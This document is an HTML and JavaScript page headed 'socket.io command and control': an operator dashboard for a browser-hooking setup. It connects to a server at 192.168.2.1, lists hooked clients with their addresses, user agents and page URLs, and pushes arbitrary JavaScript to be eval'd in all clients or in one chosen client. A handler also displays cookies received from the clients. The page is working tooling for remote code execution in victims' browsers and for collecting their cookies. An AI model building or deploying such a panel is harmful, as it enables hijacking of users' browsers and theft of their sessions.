<html>
<head>
	<link rel="stylesheet" href="http://yui.yahooapis.com/pure/0.3.0/pure-min.css">
<style>
* {
	box-sizing: border-box;
}
h2 {
	margin:2px 0 2px 0;
}
body {
	font-size:14px;
	font-family:sans-serif;
	margin: 5px;
}
header {
	margin-bottom:10px;
	border-bottom:2px solid #ccc;
	padding-bottom:5px;
	font-size:1.3em;
}
footer {
	margin-top:10px;
	border-top:2px solid #ccc;
	padding-top:5px;
}
input[type=text] {

	width:300px;
}
textarea {
	width:300px;
}
.smallfont {
	font-size:0.7em;
}
.nowrap {
	white-space: nowrap;
}
.news {
	max-height:220px;
	overflow-y:scroll;
	border:2px solid #ccc;
	font-size:0.8em;
}
.connections_box {
	margin:10px 0 10px 0;
	font-size:1.8em;
}
#connections_count {
	font-size:1.8em;
	width:90px;
	border-radius:10px;
	display:inline-block;
	text-align:center;
	background-color:#eee;
}
.connections-table  {
	background-color:#bbbbbb;
	border:1px solid #ccacca;
	font-size:0.9em;
}
.connections-table th {
	background-color:#ddd;
}
.connections-table tr {
	background-color:#fefefe;
	border-bottom:1px solid #ccc;
}
.connections-table tr:hover {
	background-color:#efefef;
}
.connections-table td {
	/*background-color:#efefef;*/
	padding:2px 6px 2px 6px;
}
.displaynone {
	display:none;
}
</style>
<style scoped>

        .pure-button-success,
        .pure-button-error,
        .pure-button-warning,
        .pure-button-secondary {
            color: white;
            border-radius: 4px;
            text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
        }

        .pure-button-success {
            background: rgb(28, 184, 65); /* this is a green */
        }

        .pure-button-error {
            background: rgb(202, 60, 60); /* this is a maroon */
        }

        .pure-button-warning {
            background: rgb(223, 117, 20); /* this is an orange */
        }

        .pure-button-secondary {
            background: rgb(66, 184, 221); /* this is a light blue */
        }

    </style>
</head>
<body>
<header>socket.io command and control</header>

<div class="pure-g">

	<div class="pure-u-1-2">

		<div class="controls">

			<div class="displaynone">
				<input id="news-text" type="text">
				<input id="news-button" type="button" class="pure-button pure-button-secondary" value="News (admin chat)">
			</div>

			<div class="displaynone">
				<input id="raw-name" type="text" style="width:150px">
				<input id="raw-value" type="text">
				<input id="raw-button" type="button" value="Raw">
			</div>

			<div class="">
				<input id="eval-text" value="console.info(document.location)">
				<input id="eval-button" type="button" class="pure-button pure-button-secondary" value="Eval to all">
			</div>

			<div>
				<input id="eval-select-id" type="text" style="width:150px">
				<input id="eval-select-value" type="text" value="alert('hi')">
				<input id="eval-select-button" type="button" class="pure-button pure-button-secondary" value="Eval to one">
			</div>

			

			<div>
				<input id="ping-button" type="button" value="Send Ping (Ask clients to refresh all data)" class="pure-button pure-button-secondary">
				<input id="broadcast-get-clients" type="button" class="displaynone" value="broadcast-get-clients">
				<input id="broadcast-get-location-button" type="button" class="displaynone" value="broadcast-get-location">
				<span class="displaynone"><input id="eval-checkbox" type="checkbox"> Run eval() locally</span>
			</div>

		</div>

	</div>

	<div class="pure-u-1-2">

		<h2>News</h2>
		<div class="news"></div>

	</div>

</div>


<div class="connections_wrapper">	


	<div class="connections_box">
		<div id="connections_count">-1</div> connections
	</div>
	<div id="connections_list"></div>


</div>





<footer>
	foot area
</footer>

<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
<script>var __socket_server="192.168.2.1"</script>
<script src="http://192.168.2.1/socket.io/socket.io.js"></script>
<script>

Object.size = function(obj) {
    var size = 0, key;
    for (key in obj) {
        if (obj.hasOwnProperty(key)) size++;
    }
    return size;
};

var sioplay = {

	socket: null,
	myinfo: {},
	pages: {},
	connections: {}, //try to keep this in sync with the server

	connect: function() {

		var that = this;


		socket = io.connect('http://'+__socket_server, {secure: false});


		var myinfo = {
			type: 'admin',
			userAgent: navigator.userAgent,
			location: document.location.href,
			buildVersion: '0.1'
		};
		socket.emit('client-info', myinfo);


		// send my info out
		//socket.emit('broadcast', 'New connection. UA: '+navigator.userAgent);

		socket.on('eval', function (data) {
			if ($('#eval-checkbox').is(':checked')) {
				eval(data);
			} else {
				console.info('blocking eval due to checkbox');
			}
			
		});

		socket.on('connections', function (data) {
		    $('#connections_count').html(data);
		});

		socket.on('news', function (data) {
			var d = new Date();
		    $('.news').prepend('<div>'+d+' - [news] '+data+'</div>');
		});

		socket.on('cookie', function (data) {
			var d = new Date();
		    $('.cookies').prepend('<div>'+d+' - '+data.location+' <input type="text" value="'+data.cookie+'"></div>');
		});

		socket.on('myinfo', function (data) {
			myinfo = data;
		});

		socket.on('delta', function (key, name, value) {
			console.info('delta update - key ['+ key + '] name [' + name +']');
			console.dir(value);
			that.connections[key][name] = value;
			that.drawTableFromConnections();
		});

		socket.on('clients', function (data) {
			console.info('got clients list from server. length '+ Object.size(data));
			console.dir(data);
			that.connections = data;

			that.drawTableFromConnections();
		});

		socket.on('ping', function (data) {
			socket.emit('pong', true);
			socket.emit('client-info', myinfo);
		});
		socket.on('broadcast-pong', function (data) {
			var d = new Date();
		    $('.news').prepend('<div>'+d+' - broadcast-pong: '+data+'</div>');
		});
		socket.on('pong', function (data) {
			var d = new Date();
		    $('.news').prepend('<div>'+d+' - pong: '+data+'</div>');
		});
	},

	drawTableFromConnections: function() {

		//var that = this;

		data = this.connections;

		var newtable = '';
		//$('#connections_list').html('');
		newtable = newtable.concat('<table class="pure-table pure-table-bordered connections-table">');
		newtable = newtable.concat('<thead><th>id<th>address<th>type<th>location<th>useragent</thead>');

		//for (var i=0;i<data.length;i++) {
		for (var prop in data) {

			if(data.hasOwnProperty(prop)){
			    //console.info(prop + " = " + data[prop]);
			    //$('#connections_list').append('<div>'+ prop + " = {address: " + data[prop].address +', port: '+ data[prop].port + '}</div>');
			    //$('#connections_list').append('<div>'+ prop + " = " + JSON.stringify(data[prop]) + '</div>');

			    var idle = -1;
			    if (!isNaN(data[prop].idletime)) idle = Math.floor(data[prop].idletime / 1000);

			    var out = '<tbody><tr><td class=nowrap><a href="#" onclick="sioplay.clickedSocketId(\''+prop+'\')">'+prop+'</a>'+
			    			  '<br>'+data[prop].connectDate;
			    if (idle !== -1) out += '<br>'+idle+' seconds idle';
			    out += '<td class=nowrap>'+data[prop].address + ':' + data[prop].port +
			                  '<td class=nowrap>'+this.clean(data[prop].type) + ' ' + this.clean(data[prop].buildVersion) +
			                  '<td>'+this.clean(data[prop].location) + 
			                  '<td class=smallfont>'+this.clean(data[prop].userAgent) + ' ';
			    out += '</tbody>';
			    newtable = newtable.concat(out);
			}
	      //console.dir(data[i]);
	      
	    }

	    newtable = newtable.concat('</table>');
	    $('#connections_list').html(newtable);
	},

	clean: function(data) {
		var c = '';
		if (typeof(data) !== "undefined") {
			c = data;
		}
		return c;
	},

	clickedSocketId: function(id) {

		

		$('#eval-select-id').val(id);

	},

	sendNews: function() {
		console.info('sendNews');
		var news = $('#news-text').val();
		socket.emit('broadcast-news', news);
		$('#news-text').val('');
		$('#news-text').focus();
	},

	sendRaw: function() {
		console.info('sendRaw '+$('#raw-name').val()+' '+$('#raw-value').val());
		socket.emit($('#raw-name').val(), $('#raw-value').val());
		
	},

	sendEval: function() {
		console.info('sendEval');
		var news = $('#eval-text').val();
		socket.emit('broadcast-eval', news);
		//$('#eval-text').val('');
		//$('#eval-text').focus();
	},

	sendEvalSelect: function() {
		console.info('sendEvalSelect');

		
		//var news = $('#eval-select-text').val();
		socket.emit('send-eval-select', $('#eval-select-id').val(), $('#eval-select-value').val());
		//$('#eval-text').val('');
		//$('#eval-text').focus();
	},

	sendGeneric: function(name, value) {
		console.info('sendGeneric('+name+','+value+')');
		socket.emit(name, value);
	},

	setupClickAndKeypress: function() {


		var that = this;

		$('#news-button').click( function(){
			sioplay.sendNews();
		});
		$('#news-text').keypress( function(e){
			if (e.which == 13) sioplay.sendNews();
		});

		$('#eval-button').click( function(){
			sioplay.sendEval();
		});

		

		$('#eval-select-button').click( function(){
			sioplay.sendEvalSelect();
		});

		$('#ping-button').click( function(){
			sioplay.sendGeneric('broadcast-ping', false);
		});

		$('#broadcast-get-location-button').click( function(){
			sioplay.sendGeneric('broadcast-get-location', null);
		});
		$('#broadcast-get-clients').click( function(){
			sioplay.sendGeneric('broadcast-get-clients', null);
		});

		$('#raw-button').click( function(){
			sioplay.sendRaw();
		});
		//$('#eval-text').keypress( function(e){
		//	if (e.which == 13) that.sendEval();
		//});

		//$('#sendnewstext').focus();

	}
};

sioplay.connect();
sioplay.setupClickAndKeypress();
console.info('started');

</script>

</body>
</html>
